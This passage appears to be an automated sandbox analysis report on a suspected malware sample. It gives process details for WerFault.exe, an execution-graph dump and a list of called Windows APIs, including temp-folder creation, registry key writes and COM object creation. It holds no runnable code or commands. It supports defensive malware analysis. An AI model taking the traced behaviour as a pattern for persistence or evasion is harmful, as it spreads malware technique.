                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 584
                                              Imagebase:0xac0000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true


                                                Execution Graph

                                                Execution Coverage:4.2%
                                                Dynamic/Decrypted Code Coverage:11.3%
                                                Signature Coverage:56.5%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:23
38845->38850 38846->38805 38846->38806 38846->38808 38846->38810 38846->38824 38846->38834 38846->38835 38846->38841 38849 402730 43 API calls 38846->38849 38854 40619e 38846->38854 38865 406c0b 38846->38865 38866 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38846->38866 40160 4025a0 41 API calls 38846->40160 40161 409c85 6 API calls 38846->40161 40162 409f97 42 API calls 38846->40162 40163 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38846->40163 38847 40628d 38851 402430 43 API calls 38847->38851 38852 402360 39 API calls 38848->38852 38849->38846 38853 406240 38850->38853 38855 40629d 38851->38855 38857 40630e 38852->38857 40167 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38853->40167 40164 408c10 43 API calls 38854->40164 40172 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38855->40172 38862 4063e4 38857->38862 38863 406316 38857->38863 38860 4062a6 38867 402360 39 API calls 38860->38867 38861 4061aa 38868 402360 39 API calls 38861->38868 40185 407260 53 API calls 2 library calls 38862->40185 40177 406f40 53 API calls 2 library calls 38863->40177 38864 406249 38870 402360 39 API calls 38864->38870 38871 403c20 21 API calls 38865->38871 38866->38841 38875 4062ae 38867->38875 38876 4061b2 38868->38876 38878 406251 38870->38878 38879 406c10 38871->38879 38874 40571b Sleep 38873->38874 38884 40574a Sleep 38873->38884 40107 100010a3 38873->40107 40110 10001f20 38873->40110 38874->38809 38874->38873 40173 406e40 53 API calls 2 library calls 38875->40173 38882 402360 39 API calls 38876->38882 38877 40631b 38890 402430 43 API calls 38877->38890 40168 406d30 53 API calls 2 library calls 38878->40168 38880 4063e9 38888 402430 43 API calls 38880->38888 38886 4061ba 38882->38886 38884->38809 38885 4062b3 38894 402430 43 API calls 38885->38894 40165 4017d0 CoUninitialize 38886->40165 38887 406256 38893 402430 43 API calls 38887->38893 38891 4063f9 38888->38891 38892 40632b 38890->38892 38901 
402360 39 API calls 38891->38901 40178 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38892->40178 38896 406266 38893->38896 38897 4062c3 38894->38897 40169 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38896->40169 40174 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38897->40174 38898 406334 38899 402360 39 API calls 38898->38899 38903 40633c 38899->38903 38905 40640d 38901->38905 40179 406fc0 53 API calls 2 library calls 38903->40179 38904 40626f 38908 402360 39 API calls 38904->38908 38909 4064ce 38905->38909 40186 4072e0 53 API calls 2 library calls 38905->40186 38906 4062cc 38910 402360 39 API calls 38906->38910 38912 406277 38908->38912 40194 407600 53 API calls 2 library calls 38909->40194 38915 4062d4 38910->38915 38911 406341 38921 402430 43 API calls 38911->38921 40170 408c10 43 API calls 38912->40170 40175 408c10 43 API calls 38915->40175 38917 40641a 38924 402430 43 API calls 38917->38924 38918 4064d8 38925 402430 43 API calls 38918->38925 38920 406283 38922 40686e 38920->38922 40232 402330 43 API calls 38920->40232 38923 406351 38921->38923 38927 401770 41 API calls 38922->38927 40180 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38923->40180 38929 40642a 38924->38929 38930 4064e8 38925->38930 38931 406881 38927->38931 40187 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38929->40187 38937 402360 39 API calls 38930->38937 38934 408380 53 API calls 38931->38934 38932 40635a 38935 402360 39 API calls 38932->38935 38938 40688a 38934->38938 38939 406362 38935->38939 38936 406433 38940 402360 39 API calls 38936->38940 38942 4064fc 38937->38942 38949 402430 43 API calls 38938->38949 40181 407040 53 API calls 2 library calls 38939->40181 38941 40643b 38940->38941 40188 407360 53 API calls 2 library calls 38941->40188 38945 4065e3 38942->38945 40195 407680 53 API calls 2 library calls 38942->40195 40205 407a20 53 API calls 2 library calls 38945->40205 38946 406367 38954 402430 43 API calls 
38946->38954 38947 406440 38957 402430 43 API calls 38947->38957 38953 40689d 38949->38953 38951 4065ed 38959 402430 43 API calls 38951->38959 38952 406509 38961 402430 43 API calls 38952->38961 38955 408300 53 API calls 38953->38955 38956 406377 38954->38956 38958 4068a8 38955->38958 38965 402360 39 API calls 38956->38965 38960 406450 38957->38960 38968 402430 43 API calls 38958->38968 38962 4065fd 38959->38962 40189 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38960->40189 38964 406519 38961->38964 38976 402360 39 API calls 38962->38976 40196 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38964->40196 38970 40638b 38965->38970 38966 406459 38971 402360 39 API calls 38966->38971 38969 4068bb 38968->38969 38973 408260 53 API calls 38969->38973 38974 4063ac 38970->38974 38975 40638f 38970->38975 38977 406461 38971->38977 38972 406522 38978 402360 39 API calls 38972->38978 38979 4068c6 38973->38979 40183 407150 53 API calls 2 library calls 38974->40183 40182 4070d0 53 API calls 2 library calls 38975->40182 38981 406611 38976->38981 40190 4073e0 53 API calls 2 library calls 38977->40190 38983 40652a 38978->38983 38994 402430 43 API calls 38979->38994 38986 406693 38981->38986 38987 406615 38981->38987 40197 407700 53 API calls 2 library calls 38983->40197 38985 406394 38999 402430 43 API calls 38985->38999 40212 407c40 53 API calls 2 library calls 38986->40212 40206 407ab0 53 API calls 2 library calls 38987->40206 38988 406466 39000 402430 43 API calls 38988->39000 38990 4063b1 38997 402430 43 API calls 38990->38997 38993 40652f 39002 402430 43 API calls 38993->39002 38998 4068d9 38994->38998 38995 406698 39008 402430 43 API calls 38995->39008 38996 40661a 39009 402430 43 API calls 38996->39009 39003 4063c1 38997->39003 39004 408d60 43 API calls 38998->39004 39005 4063a4 38999->39005 39001 406476 39000->39001 39016 402360 39 API calls 39001->39016 39006 40653f 39002->39006 39018 402360 39 API calls 39003->39018 39007 4068ee 39004->39007 40231 
4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39005->40231 40198 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39006->40198 39011 408dc0 43 API calls 39007->39011 39013 4066a8 39008->39013 39014 40662a 39009->39014 39019 406906 39011->39019 39027 402360 39 API calls 39013->39027 40207 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39014->40207 39022 40648a 39016->39022 39017 406548 39023 402360 39 API calls 39017->39023 39024 4063d5 39018->39024 39025 408e70 43 API calls 39019->39025 39020 406855 39020->38920 39026 402360 39 API calls 39020->39026 39021 406633 39028 402360 39 API calls 39021->39028 39029 406498 39022->39029 39030 40648e 39022->39030 39031 406550 39023->39031 39024->38920 40184 4071e0 53 API calls 2 library calls 39024->40184 39032 40691b 39025->39032 39026->38920 39033 4066bc 39027->39033 39034 40663b 39028->39034 40192 4074f0 53 API calls 2 library calls 39029->40192 40191 407470 53 API calls 2 library calls 39030->40191 40199 407780 53 API calls 2 library calls 39031->40199 39039 408dc0 43 API calls 39032->39039 39040 4066c0 39033->39040 39041 40673e 39033->39041 40208 407b30 53 API calls 2 library calls 39034->40208 39045 406933 39039->39045 40213 407cd0 53 API calls 2 library calls 39040->40213 40219 407e50 53 API calls 2 library calls 39041->40219 39043 406555 39054 402430 43 API calls 39043->39054 39044 40649d 39055 402430 43 API calls 39044->39055 39049 408e70 43 API calls 39045->39049 39048 406640 39057 402430 43 API calls 39048->39057 39050 406948 39049->39050 39053 408dc0 43 API calls 39050->39053 39051 406743 39061 402430 43 API calls 39051->39061 39052 4066c5 39062 402430 43 API calls 39052->39062 39056 406960 39053->39056 39058 406565 39054->39058 39059 4064ad 39055->39059 39060 402360 39 API calls 39056->39060 39063 406650 39057->39063 40200 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39058->40200 39070 402360 39 API calls 39059->39070 39065 40696e 39060->39065 39066 406753 
39061->39066 39067 4066d5 39062->39067 40209 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39063->40209 39071 402360 39 API calls 39065->39071 39082 402360 39 API calls 39066->39082 40214 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39067->40214 39069 40656e 39074 402360 39 API calls 39069->39074 39076 4064c1 39070->39076 39077 406979 39071->39077 39073 406659 39079 402360 39 API calls 39073->39079 39075 406576 39074->39075 40201 407800 53 API calls 2 library calls 39075->40201 39076->38920 40193 407580 53 API calls 2 library calls 39076->40193 39081 402360 39 API calls 39077->39081 39078 4066de 39083 402360 39 API calls 39078->39083 39084 406661 39079->39084 39087 406984 39081->39087 39088 406767 39082->39088 39089 4066e6 39083->39089 40210 407bc0 53 API calls 2 library calls 39084->40210 39085 40657b 39100 402430 43 API calls 39085->39100 39091 402360 39 API calls 39087->39091 39092 40676b 39088->39092 39093 4067be 39088->39093 40215 407d50 53 API calls 2 library calls 39089->40215 39097 40698f 39091->39097 40220 407ee0 53 API calls 2 library calls 39092->40220 40225 408060 53 API calls 2 library calls 39093->40225 39095 406666 39104 402430 43 API calls 39095->39104 39102 402360 39 API calls 39097->39102 39099 4066eb 39107 402430 43 API calls 39099->39107 39105 40658b 39100->39105 39101 4067c3 39113 402430 43 API calls 39101->39113 39106 40699a 39102->39106 39103 406770 39110 402430 43 API calls 39103->39110 39108 406676 39104->39108 39118 402360 39 API calls 39105->39118 39109 402360 39 API calls 39106->39109 39111 4066fb 39107->39111 40211 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39108->40211 39114 4069a5 39109->39114 39115 406780 39110->39115 40216 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39111->40216 39119 4067d3 39113->39119 39120 402360 39 API calls 39114->39120 40221 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39115->40221 39117 40667f 39124 402360 39 API calls 39117->39124 39125 
40659f 39118->39125 39134 402360 39 API calls 39119->39134 39121 4069b0 39120->39121 39126 402360 39 API calls 39121->39126 39123 406704 39128 402360 39 API calls 39123->39128 39124->38920 39129 4065a8 39125->39129 40202 407890 53 API calls 2 library calls 39125->40202 39170 4069bf 39126->39170 39127 406789 39131 402360 39 API calls 39127->39131 39132 40670c 39128->39132 40203 407910 53 API calls 2 library calls 39129->40203 39136 406791 39131->39136 40217 407dd0 53 API calls 2 library calls 39132->40217 39138 4067e7 39134->39138 39135 4065b2 39144 402430 43 API calls 39135->39144 40222 407f60 53 API calls 2 library calls 39136->40222 39138->38920 40226 4080e0 53 API calls 2 library calls 39138->40226 39140 406711 39146 402430 43 API calls 39140->39146 39142 406796 39148 402430 43 API calls 39142->39148 39143 4067f0 39150 402430 43 API calls 39143->39150 39145 4065c2 39144->39145 39154 402360 39 API calls 39145->39154 39149 406721 39146->39149 39147 406a1e Sleep 39147->39170 39151 4067a6 39148->39151 40218 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39149->40218 39153 406800 39150->39153 40223 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39151->40223 40227 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39153->40227 39159 4065d6 39154->39159 39156 40672a 39157 402360 39 API calls 39156->39157 39157->38920 39159->38920 40204 4079a0 53 API calls 2 library calls 39159->40204 39160 402430 43 API calls 39160->39170 39161 4067af 39162 402360 39 API calls 39161->39162 39164 4067b7 39162->39164 39163 406809 39165 402360 39 API calls 39163->39165 40224 407fe0 53 API calls 2 library calls 39164->40224 39168 406811 39165->39168 40228 408160 53 API calls 2 library calls 39168->40228 39170->39147 39170->39160 39171 406a27 39170->39171 39175 406a16 39170->39175 39172 402360 39 API calls 39171->39172 39174 406a2f 39172->39174 39173 406816 39181 402430 43 API calls 39173->39181 39177 408c40 43 API calls 39174->39177 39178 402360 39 API calls 
39175->39178 39176 4067bc 39179 402430 43 API calls 39176->39179 39180 406a40 39177->39180 39178->39147 39179->39005 39182 408c40 43 API calls 39180->39182 39183 406826 39181->39183 40229 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39183->40229 39186 40682f 39188 402360 39 API calls 39186->39188 39190 406837 39188->39190 40230 4081e0 53 API calls 2 library calls 39190->40230 39245 40b530 __CreateFrameInfo 39244->39245 39246 403d7b GetTempPathA 39245->39246 39247 403db7 39246->39247 39247->39247 39248 402730 43 API calls 39247->39248 39256 403dd3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39248->39256 39251 4092d0 43 API calls 39251->39256 39252 403f02 CreateDirectoryA Sleep 39253 403f30 __CreateFrameInfo 39252->39253 39252->39256 39258 409b4a 41 API calls 39253->39258 39254 404f20 39255 40cfaf 39 API calls 39254->39255 39257 404f43 39255->39257 39256->39251 39256->39252 39256->39254 40531 410681 39256->40531 40534 403c30 39256->40534 39259 4107e2 GetSystemTimeAsFileTime 39257->39259 39262 403f64 __CreateFrameInfo 39258->39262 39260 404f9f 39259->39260 39261 4106a2 39 API calls 39260->39261 39263 404fa8 __CreateFrameInfo 39261->39263 39267 40402b 39262->39267 40549 409c85 6 API calls 39262->40549 39266 409b4a 41 API calls 39263->39266 39265 403fe2 39265->39267 40550 409f97 42 API calls 39265->40550 39293 404ffc __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39266->39293 39269 402730 43 API calls 39267->39269 39271 4040a2 39269->39271 39270 40401e 40551 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39270->40551 39272 4092d0 43 API calls 39271->39272 39274 4040cd 39272->39274 39274->39254 39275 404147 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39274->39275 39280 404207 39275->39280 40552 409c85 6 API calls 39275->40552 39278 4041b1 39278->39280 40553 409f97 42 API calls 39278->40553 39282 402730 43 API calls 39280->39282 39281 402730 43 API calls 39281->39293 39285 404262 39282->39285 39288 4092d0 43 
API calls 39285->39288 39286 4041fa 40554 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39286->40554 39287 4092d0 43 API calls 39287->39293 39290 404281 39288->39290 39292 401e20 44 API calls 39290->39292 39291 401e20 44 API calls 39291->39293 39300 404312 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39292->39300 39293->39281 39293->39287 39293->39291 39294 4052d0 Sleep 39293->39294 39295 4058bd 39293->39295 39299 402470 43 API calls 39293->39299 39306 4052e0 __CreateFrameInfo 39293->39306 40568 409c85 6 API calls 39293->40568 40569 409f97 42 API calls 39293->40569 40570 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39293->40570 39294->39293 39297 40cfaf 39 API calls 39295->39297 39296 4043e7 __CreateFrameInfo 39302 409b4a 41 API calls 39296->39302 39298 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 39297->39298 39304 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39298->39304 39299->39293 39300->39296 40540 4021f0 39300->40540 39312 40441b __CreateFrameInfo 39302->39312 39305 405a22 39304->39305 39307 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39304->39307 39309 40cfaf 39 API calls 39305->39309 39314 409b4a 41 API calls 39306->39314 39308 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39307->39308 39310 405a1e 39308->39310 39311 405a27 39309->39311 39310->38608 39315 4107e2 GetSystemTimeAsFileTime 39311->39315 39317 4044fc 39312->39317 40555 409c85 6 API calls 39312->40555 39372 405315 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39314->39372 39318 405a7f 39315->39318 39316 4044a6 39316->39317 40556 409f97 42 API calls 39316->40556 39319 402730 43 API calls 39317->39319 39320 4106a2 39 API calls 39318->39320 39322 40455d 39319->39322 39323 405a88 Sleep 39320->39323 39325 4092d0 43 API calls 39322->39325 39326 402730 43 API calls 39323->39326 39324 4044ef 40557 409c3b EnterCriticalSection 
LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39324->40557 39333 404588 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39325->39333 39348 405aba 39326->39348 39329 402730 43 API calls 39329->39372 39331 402730 43 API calls 39417 405c80 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39331->39417 39339 4046c2 39333->39339 40558 409c85 6 API calls 39333->40558 39334 40466c 39334->39339 40559 409f97 42 API calls 39334->40559 39335 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39335->39331 39335->39417 39336 4092d0 43 API calls 39336->39372 39341 402730 43 API calls 39339->39341 39343 40471d 39341->39343 39342 4046b5 40560 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39342->40560 39344 4092d0 43 API calls 39343->39344 39347 40473c 39344->39347 39345 401e20 44 API calls 39345->39372 39351 401e20 44 API calls 39347->39351 39348->39335 40574 4025a0 41 API calls 39348->40574 39350 403a90 43 API calls 39350->39417 39354 4047cd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39351->39354 39352 4107b2 43 API calls 39352->39417 39353 409b4a 41 API calls 39353->39417 39356 404d05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39354->39356 39357 4021f0 8 API calls 39354->39357 39355 405682 39359 40577c CoUninitialize 39355->39359 39365 404dc1 CoUninitialize 39356->39365 39361 4048b8 SHGetFolderPathA 39357->39361 39358 40fb0d 15 API calls ___std_exception_copy 39358->39372 39370 405792 39359->39370 39360 4061c5 39362 406c20 53 API calls 39360->39362 39361->39356 39363 4048d5 39361->39363 39366 4061ec 39362->39366 39373 40495a 39363->39373 40561 409c85 6 API calls 39363->40561 39364 408c40 43 API calls 39364->39372 39384 404dd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39365->39384 39374 402430 43 API calls 39366->39374 39369 4035b0 52 API calls 39369->39372 39378 4057ae CoUninitialize 39370->39378 39371 404911 39371->39373 40562 409f97 42 API calls 39371->40562 39372->39295 
39372->39329 39372->39336 39372->39345 39372->39355 39372->39358 39372->39364 39372->39369 39376 402ec0 93 API calls 39372->39376 39398 403410 41 API calls 39372->39398 39448 405687 39372->39448 40571 409c85 6 API calls 39372->40571 40572 409f97 42 API calls 39372->40572 40573 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39372->40573 39377 402730 43 API calls 39373->39377 39379 4061fc 39374->39379 39376->39372 39389 4049bd 39377->39389 39391 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39378->39391 39386 402360 39 API calls 39379->39386 39381 40494d 40563 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39381->40563 39382 4092d0 43 API calls 39382->39417 39387 404e42 CoUninitialize 39384->39387 39390 406210 39386->39390 39406 404e52 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39387->39406 39388 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39392 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39388->39392 39409 4049f1 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39389->39409 40564 409590 43 API calls 4 library calls 39389->40564 39394 4062e5 39390->39394 39395 406218 39390->39395 39391->39295 39391->39388 39397 4058b6 39392->39397 40591 406ec0 53 API calls 2 library calls 39394->40591 39403 406288 39395->39403 39404 40622b 39395->39404 39396 40cfaf 39 API calls 39396->39417 39397->38608 39398->39372 39399 401e20 44 API calls 39399->39417 39401 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39407 404f19 39401->39407 39402 4062ea 39414 402430 43 API calls 39402->39414 40586 406db0 53 API calls 2 library calls 39403->40586 40581 406ca0 53 API calls 2 library calls 39404->40581 39405 404bc3 CoInitialize CoCreateInstance 39405->39356 39439 404c68 39405->39439 39406->39401 39407->38608 39408 406192 Sleep 39408->39417 39409->39405 40565 409c85 6 API calls 39409->40565 39419 4062fa 39414->39419 39415 406230 39422 402430 43 API 
calls 39415->39422 39416 404b87 39416->39405 40566 409f97 42 API calls 39416->40566 39417->39350 39417->39352 39417->39353 39417->39360 39417->39382 39417->39396 39417->39399 39417->39408 39420 402730 43 API calls 39417->39420 39428 40619e 39417->39428 39440 406c0b 39417->39440 39441 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39417->39441 40575 4025a0 41 API calls 39417->40575 40576 409c85 6 API calls 39417->40576 40577 409f97 42 API calls 39417->40577 40578 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39417->40578 39418 40628d 39424 402430 43 API calls 39418->39424 39425 402360 39 API calls 39419->39425 39420->39417 39426 406240 39422->39426 39423 404bb6 40567 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39423->40567 39429 40629d 39424->39429 39431 40630e 39425->39431 40582 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39426->40582 40579 408c10 43 API calls 39428->40579 40587 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39429->40587 39436 4063e4 39431->39436 39437 406316 39431->39437 39434 4062a6 39442 402360 39 API calls 39434->39442 39435 4061aa 39443 402360 39 API calls 39435->39443 40600 407260 53 API calls 2 library calls 39436->40600 40592 406f40 53 API calls 2 library calls 39437->40592 39438 406249 39445 402360 39 API calls 39438->39445 39459 404cb5 MultiByteToWideChar 39439->39459 39460 404ce3 CoUninitialize 39439->39460 39446 403c20 21 API calls 39440->39446 39441->39408 39450 4062ae 39442->39450 39451 4061b2 39443->39451 39453 406251 39445->39453 39454 406c10 39446->39454 39449 40571b Sleep 39448->39449 39461 40574a Sleep 39448->39461 39820 10001f20 75 API calls 39448->39820 39821 100010a3 CoUninitialize 39448->39821 39449->39355 39449->39448 40588 406e40 53 API calls 2 library calls 39450->40588 39457 402360 39 API calls 39451->39457 39452 40631b 39467 402430 43 API calls 39452->39467 40583 406d30 53 API calls 2 library 
calls 39453->40583 39455 4063e9 39465 402430 43 API calls 39455->39465 39463 4061ba 39457->39463 39459->39460 39460->39356 39461->39355 39462 4062b3 39471 402430 43 API calls 39462->39471 40580 4017d0 CoUninitialize 39463->40580 39464 406256 39473 402430 43 API calls 39464->39473 39469 4063f9 39465->39469 39470 40632b 39467->39470 39477 402360 39 API calls 39469->39477 40593 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39470->40593 39474 4062c3 39471->39474 39476 406266 39473->39476 40589 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39474->40589 39475 406334 39479 402360 39 API calls 39475->39479 40584 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39476->40584 39481 40640d 39477->39481 39483 40633c 39479->39483 39485 4064ce 39481->39485 40601 4072e0 53 API calls 2 library calls 39481->40601 39482 4062cc 39486 402360 39 API calls 39482->39486 40594 406fc0 53 API calls 2 library calls 39483->40594 39484 40626f 39488 402360 39 API calls 39484->39488 40609 407600 53 API calls 2 library calls 39485->40609 39490 4062d4 39486->39490 39492 406277 39488->39492 40590 408c10 43 API calls 39490->40590 39491 406341 39498 402430 43 API calls 39491->39498 40585 408c10 43 API calls 39492->40585 39494 40641a 39499 402430 43 API calls 39494->39499 39497 4064d8 39502 402430 43 API calls 39497->39502 39501 406351 39498->39501 39503 40642a 39499->39503 39500 40686e 39505 401770 41 API calls 39500->39505 40595 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39501->40595 39507 4064e8 39502->39507 40602 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39503->40602 39509 406881 39505->39509 39514 402360 39 API calls 39507->39514 39512 408380 53 API calls 39509->39512 39510 40635a 39513 402360 39 API calls 39510->39513 39511 406433 39515 402360 39 API calls 39511->39515 39516 40688a 39512->39516 39517 406362 39513->39517 39518 4064fc 39514->39518 39519 40643b 39515->39519 39525 402430 43 API calls 39516->39525 40596 407040 53 API 
calls 2 library calls 39517->40596 39745 4065e3 39518->39745 40610 407680 53 API calls 2 library calls 39518->40610 40603 407360 53 API calls 2 library calls 39519->40603 39522 406367 39530 402430 43 API calls 39522->39530 39524 406440 39533 402430 43 API calls 39524->39533 39529 40689d 39525->39529 39527 4065ed 39535 402430 43 API calls 39527->39535 39528 406509 39536 402430 43 API calls 39528->39536 39531 408300 53 API calls 39529->39531 39532 406377 39530->39532 39534 4068a8 39531->39534 39541 402360 39 API calls 39532->39541 39537 406450 39533->39537 39544 402430 43 API calls 39534->39544 39538 4065fd 39535->39538 39539 406519 39536->39539 40604 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39537->40604 39552 402360 39 API calls 39538->39552 40611 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39539->40611 39546 40638b 39541->39546 39543 406459 39548 402360 39 API calls 39543->39548 39545 4068bb 39544->39545 39549 408260 53 API calls 39545->39549 39550 4063ac 39546->39550 39551 40638f 39546->39551 39547 406522 39553 402360 39 API calls 39547->39553 39554 406461 39548->39554 39555 4068c6 39549->39555 40598 407150 53 API calls 2 library calls 39550->40598 40597 4070d0 53 API calls 2 library calls 39551->40597 39557 406611 39552->39557 39558 40652a 39553->39558 40605 4073e0 53 API calls 2 library calls 39554->40605 39570 402430 43 API calls 39555->39570 39562 406693 39557->39562 39563 406615 39557->39563 40612 407700 53 API calls 2 library calls 39558->40612 39561 406394 39574 402430 43 API calls 39561->39574 40627 407c40 53 API calls 2 library calls 39562->40627 40621 407ab0 53 API calls 2 library calls 39563->40621 39565 4063b1 39575 402430 43 API calls 39565->39575 39566 406466 39576 402430 43 API calls 39566->39576 39569 40652f 39579 402430 43 API calls 39569->39579 39573 4068d9 39570->39573 39571 406698 39582 402430 43 API calls 39571->39582 39572 40661a 39583 402430 43 API calls 39572->39583 39578 408d60 43 API calls 39573->39578 
39760 4063a4 39574->39760 39580 4063c1 39575->39580 39577 406476 39576->39577 39590 402360 39 API calls 39577->39590 39581 4068ee 39578->39581 39584 40653f 39579->39584 39594 402360 39 API calls 39580->39594 39585 408dc0 43 API calls 39581->39585 39586 4066a8 39582->39586 39587 40662a 39583->39587 40613 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39584->40613 39591 406906 39585->39591 39605 402360 39 API calls 39586->39605 40622 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39587->40622 39596 40648a 39590->39596 39597 408e70 43 API calls 39591->39597 39593 406548 39599 402360 39 API calls 39593->39599 39600 4063d5 39594->39600 39595 406855 39601 402360 39 API calls 39595->39601 39704 406283 39595->39704 39602 406498 39596->39602 39603 40648e 39596->39603 39604 40691b 39597->39604 39598 406633 39606 402360 39 API calls 39598->39606 39607 406550 39599->39607 39600->39704 40599 4071e0 53 API calls 2 library calls 39600->40599 39601->39704 40607 4074f0 53 API calls 2 library calls 39602->40607 40606 407470 53 API calls 2 library calls 39603->40606 39610 408dc0 43 API calls 39604->39610 39611 4066bc 39605->39611 39612 40663b 39606->39612 40614 407780 53 API calls 2 library calls 39607->40614 39616 406933 39610->39616 39617 4066c0 39611->39617 39618 40673e 39611->39618 40623 407b30 53 API calls 2 library calls 39612->40623 39615 40649d 39628 402430 43 API calls 39615->39628 39621 408e70 43 API calls 39616->39621 40628 407cd0 53 API calls 2 library calls 39617->40628 40634 407e50 53 API calls 2 library calls 39618->40634 39620 406555 39630 402430 43 API calls 39620->39630 39624 406640 39633 402430 43 API calls 39624->39633 39626 406743 39636 402430 43 API calls 39626->39636 39627 4066c5 39637 402430 43 API calls 39627->39637 39631 4064ad 39628->39631 39634 406565 39630->39634 39645 402360 39 API calls 39631->39645 39638 406650 39633->39638 40615 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39634->40615 39641 406753 39636->39641 
                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,?,024FEF0D,76230F00,00000000), ref: 00403D8A
                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F19
                                                • Sleep.KERNEL32(000003E8), ref: 00403F22
                                                • __Init_thread_footer.LIBCMT ref: 004044F7
                                                • __Init_thread_footer.LIBCMT ref: 004046BD
                                                • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 004048C7
                                                • __Init_thread_footer.LIBCMT ref: 00404955
                                                • __Init_thread_footer.LIBCMT ref: 00404BBE
                                                • CoInitialize.OLE32(00000000), ref: 00404C3F
